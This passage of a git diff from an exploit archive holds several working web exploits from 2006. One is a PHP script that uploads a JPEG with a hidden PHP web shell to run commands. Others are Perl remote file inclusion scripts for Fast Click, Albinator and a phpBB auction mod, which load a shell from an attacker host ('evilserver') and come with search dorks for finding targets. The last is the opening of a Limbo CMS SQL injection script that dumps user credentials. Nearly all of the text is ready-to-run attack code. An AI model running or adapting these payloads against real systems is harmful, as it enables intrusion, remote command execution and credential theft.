+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+function make_seed()
+{
+   list($usec, $sec) = explode(' ', microtime());
+   return (float) $sec + ((float) $usec * 100000);
+}
+
+
+$host=$argv[1];
+$path=$argv[2];
+$cmd="";$port=80;$proxy="";
+
+for ($i=3; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+srand(make_seed());
+$v = rand(1,99);
+
+echo "step 1 -> register...\r\n";
+$data="username=suntzu".$v;
+$data.="&pass1=suntzu";
+$data.="&pass2=suntzu";
+$data.="&email=suntzu".$v."@hotmail.com";
+$packet ="POST ".$p."index.php?act=register&step=1 HTTP/1.0\r\n";
+$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+
+echo "step 2 -> login...\r\n";
+$data="dologin=dologin";
+$data.="&username=suntzu".$v;
+$data.="&password=suntzu";
+$packet="POST ".$p."index.php HTTP/1.0\r\n";
+$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+$temp=explode("Set-Cookie: ",$html);
+$temp2=explode(" ",$temp[1]);$cookie=$temp2[0];
+$temp2=explode(" ",$temp[2]);$cookie.=" ".$temp2[0];
+if ($cookie=="") {die("Failed to login...\r\n");}
+echo "Cookie -> ".$cookie."\r\n";
+echo "step 3 -> upload an avatar...\r\n";
+$shell=
+chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x00).chr(0xcf).chr(0x3c).chr(0x3f).
+chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x69).chr(0x66).chr(0x20).
+chr(0x28).chr(0x67).chr(0x65).chr(0x74).chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).
+chr(0x69).chr(0x63).chr(0x5f).chr(0x71).chr(0x75).chr(0x6f).chr(0x74).chr(0x65).
+chr(0x73).chr(0x5f).chr(0x67).chr(0x70).chr(0x63).chr(0x28).chr(0x29).chr(0x29).
+chr(0x7b).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).
+chr(0x45).chr(0x5b).chr(0x27).chr(0x63).chr(0x6d).chr(0x64).chr(0x27).chr(0x5d).
+chr(0x3d).chr(0x73).chr(0x74).chr(0x72).chr(0x69).chr(0x70).chr(0x73).chr(0x6c).
+chr(0x61).chr(0x73).chr(0x68).chr(0x65).chr(0x73).chr(0x28).chr(0x24).chr(0x5f).
+chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x27).
+chr(0x63).chr(0x6d).chr(0x64).chr(0x27).chr(0x5d).chr(0x29).chr(0x3b).chr(0x7d).
+chr(0x0d).chr(0x0a).chr(0x65).chr(0x72).chr(0x72).chr(0x6f).chr(0x72).chr(0x5f).
+chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74).chr(0x69).chr(0x6e).
+chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x69).
+chr(0x6e).chr(0x69).chr(0x5f).chr(0x73).chr(0x65).chr(0x74).chr(0x28).chr(0x22).
+chr(0x6d).chr(0x61).chr(0x78).chr(0x5f).chr(0x65).chr(0x78).chr(0x65).chr(0x63).
+chr(0x75).chr(0x74).chr(0x69).chr(0x6f).chr(0x6e).chr(0x5f).chr(0x74).chr(0x69).
+chr(0x6d).chr(0x65).chr(0x22).chr(0x2c).chr(0x30).chr(0x29).chr(0x3b).chr(0x0d).
+chr(0x0a).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x22).chr(0x35).
+chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x22).chr(0x3b).chr(0x0d).chr(0x0a).
+chr(0x70).chr(0x61).chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).
+chr(0x28).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).
+chr(0x45).chr(0x5b).chr(0x22).chr(0x63).chr(0x6d).chr(0x64).chr(0x22).chr(0x5d).
+chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).
+chr(0x20).chr(0x22).chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x22).
+chr(0x3b).chr(0x0d).chr(0x0a).chr(0x64).chr(0x69).chr(0x65).chr(0x3b).chr(0x0d).
+chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a).
+chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x00).
+chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).chr(0x00).
+chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0xff).
+chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).chr(0x01).
+chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03).
+chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).chr(0x01).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x09).
+chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xc4).
+chr(0x00).chr(0x14).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x06).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).
+chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
+chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).chr(0x01).
+chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).chr(0x00).
+chr(0x3f).chr(0xc1).chr(0xc7).chr(0xdf).chr(0xff).chr(0xd9).chr(0x00).chr(0x00);
+
+$data='-----------------------------7d63ba6e09fc
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+5242880
+-----------------------------7d63ba6e09fc
+Content-Disposition: form-data; name="avatar"; filename="whatever.jpg"
+Content-Type: image/jpeg
+
+'.$shell.'
+-----------------------------7d63ba6e09fc--
+';
+
+echo "step 4 -> launch commands...\r\n";
+$packet="POST ".$p."index.php?act=usercp&cp_page=upload&uploaded=1 HTTP/1.0\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d63ba6e09fc\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Cookie: ".$cookie."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+
+$path_to_shell=urlencode("../uploads/avatar_suntzu".$v.".jpeg");
+$packet ="GET ".$p."help/index.php?help_file=".$path_to_shell." HTTP/1.0\r\n";
+$packet.="User-Agent: Googlebot/2.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: cmd=".$cmd."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+if (strstr($html,"56789"))
+  {
+    echo "Exploit succeeded...\r\n\r\n";
+    $temp=explode("56789",$html);
+    echo $temp[1];
+    die;
+  }
+//if you are here...
+echo "Exploit failed...";
+?>
+
+# milw0rm.com [2006-05-02]
diff --git a/platforms/php/webapps/1740.pl b/platforms/php/webapps/1740.pl
index b345a6ac9..b9adb283f 100755
--- a/platforms/php/webapps/1740.pl
+++ b/platforms/php/webapps/1740.pl
@@ -1,76 +1,76 @@
-#!/usr/bin/perl
-##
-# Fast Click <= 2.3.8 Remote File Inclusion exploit
-# Bug discovered and cod3d by R@1D3N (amin emami)
-#Greet:Outlaw - Aura - Dltrp - Cl0wn - B3HZAD - sm0k3r - Exploitercode - Str0ke and all persian Cyber team
-#http://www.aria-security.net
-#Dork:inurl:"fclick.php?fid"
-# usage:
-# perl fc.pl <target> <cmd shell location> <cmd shell variable>
-# perl fc.pl http://target.com/fclick/ http://target.com/cmd.gif cmd
-# cmd shell example: <?system($cmd);?>
-# cmd shell variable: ($_GET[cmd]);
-
-use LWP::UserAgent;
-
-$Path = $ARGV[0];
-$Pathtocmd = $ARGV[1];
-$cmdv = $ARGV[2];
-
-if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
-
-head();
-
-while()
-{
-      print "[shell] \$";
-while(<STDIN>)
-      {
-              $cmd=$_;
-              chomp($cmd);
-
-$xpl = LWP::UserAgent->new() or die;
-$req = HTTP::Request->new(GET =>$Path.'show.php?path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
-
-$res = $xpl->request($req);
-$return = $res->content;
-$return =~ tr/[\n]/[ê]/;
-
-if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
-
-elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
-      {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
-elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
-
-if($return =~ /(.*)/)
-
-{
-      $finreturn = $1;
-      $finreturn=~ tr/[ê]/[\n]/;
-      print "\r\n$finreturn\n\r";
-      last;
-}
-
-else {print "[shell] \$";}}}last;
-
-sub head()
- {
- print "\n============================================================================\r\n";
- print " Fast Click <= 2.3.8 Remote File Inclusion exploit\r\n";
- print "============================================================================\r\n";
- }
-sub usage()
- {
- head();
- print " Usage: perl fc.pl <target> <cmd shell location> <cmd shell variable>\r\n\n";
- print " <Site> - Full path to Fastclick ex: http://www.site.com/fclick/ \r\n";
- print " <cmd shell> - Path to cmd Shell e.g http://evilserver/cmd.gif \r\n";
- print " <cmd variable> - Command variable used in php shell \r\n";
- print "============================================================================\r\n";
- print "                           bug discovered by RAYD3N \r\n";
- print " www.Aria-security.net/Forums/ \r\n";
- print "============================================================================\r\n";
- exit();
- }
-
-# milw0rm.com [2006-05-02]
+#!/usr/bin/perl
+##
+# Fast Click <= 2.3.8 Remote File Inclusion exploit
+# Bug discovered and cod3d by R@1D3N (amin emami)
+#Greet:Outlaw - Aura - Dltrp - Cl0wn - B3HZAD - sm0k3r - Exploitercode - Str0ke and all persian Cyber team
+#http://www.aria-security.net
+#Dork:inurl:"fclick.php?fid"
+# usage:
+# perl fc.pl <target> <cmd shell location> <cmd shell variable>
+# perl fc.pl http://target.com/fclick/ http://target.com/cmd.gif cmd
+# cmd shell example: <?system($cmd);?>
+# cmd shell variable: ($_GET[cmd]);
+
+use LWP::UserAgent;
+
+$Path = $ARGV[0];
+$Pathtocmd = $ARGV[1];
+$cmdv = $ARGV[2];
+
+if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
+
+head();
+
+while()
+{
+      print "[shell] \$";
+while(<STDIN>)
+      {
+              $cmd=$_;
+              chomp($cmd);
+
+$xpl = LWP::UserAgent->new() or die;
+$req = HTTP::Request->new(GET =>$Path.'show.php?path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
+
+$res = $xpl->request($req);
+$return = $res->content;
+$return =~ tr/[\n]/[ê]/;
+
+if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
+
+elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
+      {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
+elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
+
+if($return =~ /(.*)/)
+
+{
+      $finreturn = $1;
+      $finreturn=~ tr/[ê]/[\n]/;
+      print "\r\n$finreturn\n\r";
+      last;
+}
+
+else {print "[shell] \$";}}}last;
+
+sub head()
+ {
+ print "\n============================================================================\r\n";
+ print " Fast Click <= 2.3.8 Remote File Inclusion exploit\r\n";
+ print "============================================================================\r\n";
+ }
+sub usage()
+ {
+ head();
+ print " Usage: perl fc.pl <target> <cmd shell location> <cmd shell variable>\r\n\n";
+ print " <Site> - Full path to Fastclick ex: http://www.site.com/fclick/ \r\n";
+ print " <cmd shell> - Path to cmd Shell e.g http://evilserver/cmd.gif \r\n";
+ print " <cmd variable> - Command variable used in php shell \r\n";
+ print "============================================================================\r\n";
+ print "                           bug discovered by RAYD3N \r\n";
+ print " www.Aria-security.net/Forums/ \r\n";
+ print "============================================================================\r\n";
+ exit();
+ }
+
+# milw0rm.com [2006-05-02]
diff --git a/platforms/php/webapps/1744.pl b/platforms/php/webapps/1744.pl
index 54da725dd..03e378f71 100755
--- a/platforms/php/webapps/1744.pl
+++ b/platforms/php/webapps/1744.pl
@@ -1,76 +1,76 @@
-#!/usr/bin/perl
-##
-#Albinator Multiple Parameter File Inclusion 
-# Bug discovered by VietMafia and r0t
-# code copier: webDEViL w3bd3vil[at]gmail.com
-#code same as Fast Click <= 2.3.8 Remote File Inclusion exploit
-#Dork:"powered by Albinator "
-# usage:
-# perl wb.pl <target> <cmd shell location> <cmd shell variable>
-# perl wb.pl http://vulnerable.com/ http://target.com/cmd.gif cmd
-# cmd shell example: <?system($cmd);?>
-# cmd shell variable: ($_GET[cmd]);
-
-use LWP::UserAgent;
-
-$Path = $ARGV[0];
-$Pathtocmd = $ARGV[1];
-$cmdv = $ARGV[2];
-
-if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
-
-head();
-
-while()
-{
-      print "[shell] \$";
-while(<STDIN>)
-      {
-              $cmd=$_;
-              chomp($cmd);
-
-$xpl = LWP::UserAgent->new() or die;
-$req = HTTP::Request->new(GET =>$Path.'eshow.php?Config_rootdir='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; 
-## can change eshow.php to eday.php or forgot.php
-
-$res = $xpl->request($req);
-$return = $res->content;
-$return =~ tr/[\n]/[ê]/;
-
-if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
-
-elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
-      {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
-elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
-
-if($return =~ /(.*)/)
-
-{
-      $finreturn = $1;
-      $finreturn=~ tr/[ê]/[\n]/;
-      print "\r\n$finreturn\n\r";
-      last;
-}
-
-else {print "[shell] \$";}}}last;
-
-sub head()
- {
- print "\n============================================================================\r\n";
- print " Albinator Multiple Parameter File Inclusion\r\n";
- print "============================================================================\r\n";
- }
-sub usage()
- {
- head();
- print " Usage: perl wb.pl <target> <cmd shell location> <cmd shell variable>\r\n\n";
- print " <Site> - Full path to Albinator ex: http://www.site.com/ \r\n";
- print " <cmd shell> - Path to cmd Shell e.g http://evilserver/cmd.gif \r\n";
- print " <cmd variable> - Command variable used in php shell \r\n";
- print "============================================================================\r\n";
- print "                          webDEViL w3bd3vil[at]gmail.com \r\n";
- print "============================================================================\r\n";
- exit();
- }
-
-# milw0rm.com [2006-05-03]
+#!/usr/bin/perl
+##
+#Albinator Multiple Parameter File Inclusion 
+# Bug discovered by VietMafia and r0t
+# code copier: webDEViL w3bd3vil[at]gmail.com
+#code same as Fast Click <= 2.3.8 Remote File Inclusion exploit
+#Dork:"powered by Albinator "
+# usage:
+# perl wb.pl <target> <cmd shell location> <cmd shell variable>
+# perl wb.pl http://vulnerable.com/ http://target.com/cmd.gif cmd
+# cmd shell example: <?system($cmd);?>
+# cmd shell variable: ($_GET[cmd]);
+
+use LWP::UserAgent;
+
+$Path = $ARGV[0];
+$Pathtocmd = $ARGV[1];
+$cmdv = $ARGV[2];
+
+if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
+
+head();
+
+while()
+{
+      print "[shell] \$";
+while(<STDIN>)
+      {
+              $cmd=$_;
+              chomp($cmd);
+
+$xpl = LWP::UserAgent->new() or die;
+$req = HTTP::Request->new(GET =>$Path.'eshow.php?Config_rootdir='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; 
+## can change eshow.php to eday.php or forgot.php
+
+$res = $xpl->request($req);
+$return = $res->content;
+$return =~ tr/[\n]/[ê]/;
+
+if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
+
+elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
+      {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
+elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
+
+if($return =~ /(.*)/)
+
+{
+      $finreturn = $1;
+      $finreturn=~ tr/[ê]/[\n]/;
+      print "\r\n$finreturn\n\r";
+      last;
+}
+
+else {print "[shell] \$";}}}last;
+
+sub head()
+ {
+ print "\n============================================================================\r\n";
+ print " Albinator Multiple Parameter File Inclusion\r\n";
+ print "============================================================================\r\n";
+ }
+sub usage()
+ {
+ head();
+ print " Usage: perl wb.pl <target> <cmd shell location> <cmd shell variable>\r\n\n";
+ print " <Site> - Full path to Albinator ex: http://www.site.com/ \r\n";
+ print " <cmd shell> - Path to cmd Shell e.g http://evilserver/cmd.gif \r\n";
+ print " <cmd variable> - Command variable used in php shell \r\n";
+ print "============================================================================\r\n";
+ print "                          webDEViL w3bd3vil[at]gmail.com \r\n";
+ print "============================================================================\r\n";
+ exit();
+ }
+
+# milw0rm.com [2006-05-03]
diff --git a/platforms/php/webapps/1747.pl b/platforms/php/webapps/1747.pl
index 528af2835..150ab30cf 100755
--- a/platforms/php/webapps/1747.pl
+++ b/platforms/php/webapps/1747.pl
@@ -1,76 +1,76 @@
-#!/usr/bin/perl
-##
-#phpBB auction mod - Remote File Inclusion Vuln
-# Bug discovered by VietMafia
-# code copier: webDEViL w3bd3vil[at]gmail.com
-#code same as Fast Click <= 2.3.8 Remote File Inclusion exploit
-# dork: intext:"phpbb - auction" inurl:"auction"
-# usage:
-# perl wb1.pl <target> <cmd shell location> <cmd shell variable>
-# perl wb1.pl http://vulnerable.com/ http://target.com/cmd.gif cmd
-# cmd shell example: <?system($cmd);?>
-# cmd shell variable: ($_GET[cmd]);
-
-use LWP::UserAgent;
-
-$Path = $ARGV[0];
-$Pathtocmd = $ARGV[1];
-$cmdv = $ARGV[2];
-
-if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
-
-head();
-
-while()
-{
-      print "[shell] \$";
-while(<STDIN>)
-      {
-              $cmd=$_;
-              chomp($cmd);
-
-$xpl = LWP::UserAgent->new() or die;
-$req = HTTP::Request->new(GET =>$Path.'/auction/auction_common.php?phpbb_root_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; 
-
-
-$res = $xpl->request($req);
-$return = $res->content;
-$return =~ tr/[\n]/[ê]/;
-
-if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
-
-elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
-      {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
-elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
-
-if($return =~ /(.*)/)
-
-{
-      $finreturn = $1;
-      $finreturn=~ tr/[ê]/[\n]/;
-      print "\r\n$finreturn\n\r";
-      last;
-}
-
-else {print "[shell] \$";}}}last;
-
-sub head()
- {
- print "\n============================================================================\r\n";
- print "  phpBB auction mod - Remote File Inclusion Vuln\r\n";
- print "============================================================================\r\n";
- }
-sub usage()
- {
- head();
- print " Usage: perl wb1.pl <target> <cmd shell location> <cmd shell variable>\r\n\n";
- print " <Site> - Full path to phpBB auction ex: http://www.site.com/ or http://www.site.com/phpbb/ \r\n";
- print " <cmd shell> - Path to cmd Shell e.g http://evilserver/cmd.gif \r\n";
- print " <cmd variable> - Command variable used in php shell \r\n";
- print "============================================================================\r\n";
- print "                          webDEViL w3bd3vil[at]gmail.com \r\n";
- print "============================================================================\r\n";
- exit();
- }
-
-# milw0rm.com [2006-05-04]
+#!/usr/bin/perl
+##
+#phpBB auction mod - Remote File Inclusion Vuln
+# Bug discovered by VietMafia
+# code copier: webDEViL w3bd3vil[at]gmail.com
+#code same as Fast Click <= 2.3.8 Remote File Inclusion exploit
+# dork: intext:"phpbb - auction" inurl:"auction"
+# usage:
+# perl wb1.pl <target> <cmd shell location> <cmd shell variable>
+# perl wb1.pl http://vulnerable.com/ http://target.com/cmd.gif cmd
+# cmd shell example: <?system($cmd);?>
+# cmd shell variable: ($_GET[cmd]);
+
+use LWP::UserAgent;
+
+$Path = $ARGV[0];
+$Pathtocmd = $ARGV[1];
+$cmdv = $ARGV[2];
+
+if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
+
+head();
+
+while()
+{
+      print "[shell] \$";
+while(<STDIN>)
+      {
+              $cmd=$_;
+              chomp($cmd);
+
+$xpl = LWP::UserAgent->new() or die;
+$req = HTTP::Request->new(GET =>$Path.'/auction/auction_common.php?phpbb_root_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n"; 
+
+
+$res = $xpl->request($req);
+$return = $res->content;
+$return =~ tr/[\n]/[ê]/;
+
+if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
+
+elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
+      {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
+elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
+
+if($return =~ /(.*)/)
+
+{
+      $finreturn = $1;
+      $finreturn=~ tr/[ê]/[\n]/;
+      print "\r\n$finreturn\n\r";
+      last;
+}
+
+else {print "[shell] \$";}}}last;
+
+sub head()
+ {
+ print "\n============================================================================\r\n";
+ print "  phpBB auction mod - Remote File Inclusion Vuln\r\n";
+ print "============================================================================\r\n";
+ }
+sub usage()
+ {
+ head();
+ print " Usage: perl wb1.pl <target> <cmd shell location> <cmd shell variable>\r\n\n";
+ print " <Site> - Full path to phpBB auction ex: http://www.site.com/ or http://www.site.com/phpbb/ \r\n";
+ print " <cmd shell> - Path to cmd Shell e.g http://evilserver/cmd.gif \r\n";
+ print " <cmd variable> - Command variable used in php shell \r\n";
+ print "============================================================================\r\n";
+ print "                          webDEViL w3bd3vil[at]gmail.com \r\n";
+ print "============================================================================\r\n";
+ exit();
+ }
+
+# milw0rm.com [2006-05-04]
diff --git a/platforms/php/webapps/1751.php b/platforms/php/webapps/1751.php
index ad5e27816..fb8287c53 100755
--- a/platforms/php/webapps/1751.php
+++ b/platforms/php/webapps/1751.php
@@ -1,51 +1,51 @@
-<pre>
-[i] Limbo CMS (option=weblinks) sql injection exploit
-[i] coded by [Oo]
-<?php
-
-if( (!isset($_GET['host'])) || (!isset($_GET['path'])) || (!isset($_GET['id'])))
-{
-?>	
-[*] Usage: <?echo htmlentities($PHP_SELF)?>?host=[hostname]&path=[limbo_path]&id=[user_id]
-[*] Exemple: <?echo htmlentities($PHP_SELF)?>?host=127.0.0.1&path=/limbo&id=1
-
-[g] Google: inurl:"index2.php?option=rss" OR "powered By Limbo CMS"	
-<?php
-die;
-}
-
-$host = $_GET['host'];
-$path = $_GET['path'];
-$id = $_GET['id'];
-
-$success = 0;
-
-$fp = fsockopen($host, 80, $errno, $errstr, 30);
-if (!$fp) {
-   die("[-] Connection Error!");
-} 
-else {
-
-   $out = "GET $path/index.php?option=weblinks&Itemid=44&catid=-1%20union%20select%200,1,2,concat(char(0x6c,0x6f,0x67,0x69,0x6e,0x3a),username,char(0x20,0x70,0x61,0x73,0x73,0x77,0x6f,0x72,0x64,0x3a),password),4,5,6,7,8,9,10,11%20from%20lm_users%20where%20id=$id/* HTTP/1.1\r\n";
-   $out .= "Host: $host\r\n";
-   $out .= "Connection: Close\r\n\r\n";
-
-   fwrite($fp, $out);
-   while (!feof($fp)) {
-	   $f = fgets($fp, 1024);
-       if ( (preg_match("/<div class=\"componentheading\" >/",$f)) && (preg_match("/login/",$f)) )
-       {
-			echo "$f";
-			echo "[+] Enjoy! :><br>";
-			$success = 1;
-	   }
-   }
-   fclose($fp);
-   
-   if (!$success)
-	echo "<br>[-] exploit failed :<<br>";
-}
-?> 
-</pre>
-
-# milw0rm.com [2006-05-05]
+<pre>
+[i] Limbo CMS (option=weblinks) sql injection exploit
+[i] coded by [Oo]
+<?php
+
+if( (!isset($_GET['host'])) || (!isset($_GET['path'])) || (!isset($_GET['id'])))
+{
+?>	
+[*] Usage: <?echo htmlentities($PHP_SELF)?>?host=[hostname]&path=[limbo_path]&id=[user_id]
+[*] Exemple: <?echo htmlentities($PHP_SELF)?>?host=127.0.0.1&path=/limbo&id=1
+
+[g] Google: inurl:"index2.php?option=rss" OR "powered By Limbo CMS"	
+<?php
+die;
+}
+
+$host = $_GET['host'];
+$path = $_GET['path'];
+$id = $_GET['id'];
+
+$success = 0;
+
+$fp = fsockopen($host, 80, $errno, $errstr, 30);
+if (!$fp) {
+   die("[-] Connection Error!");
+} 
+else {
+
